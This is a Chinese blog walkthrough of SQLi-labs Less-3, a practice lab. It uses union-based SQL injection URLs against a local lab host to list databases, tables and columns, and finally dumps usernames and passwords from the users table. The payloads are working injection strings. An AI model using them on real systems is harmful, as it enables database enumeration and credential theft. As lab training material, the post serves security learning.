sqll-libs(3)

时间：2019-08-10 01:02:32 阅读：106 评论：0 收藏：0 [点我收藏+]

单引号测试，最外层单引号错误信息near ‘‘1‘‘) LIMIT 0,1‘ at line 1 由此我们可以确定SQL后台语句为select * from table where id =(‘input‘)。

查看源码，也证实了我们的猜想，

技术分享图片

1.union 注入

我们用 ) 来闭合代码中的 ( ，然后用注释符去掉后面的 )

查看当前数据库：http://192.168.48.130/sqli-labs-master/Less-3/?id=-6‘) union select 1,database(),3--+

技术分享图片

查询所有的数据库：http://192.168.48.130/sqli-labs-master/Less-3/?id=-6‘) union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+

技术分享图片

查询security数据库下的所有数据表：

http://192.168.48.130/sqli-labs-master/Less-3/?id=-6‘) union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479),3--+

技术分享图片

爆出所有users数据表下的所有字段名：

http://192.168.48.130/sqli-labs-master/Less-3/?id=-6‘) union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273),3--+

技术分享图片

爆出关键字段username和password的值：

http://192.168.48.130/sqli-labs-master/Less-3/?id=-6‘) union select 1,(select group_concat(username,0x3a,password) from users),3--+

技术分享图片

sqll-libs(3)

原文：https://www.cnblogs.com/kuaile1314/p/11330101.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)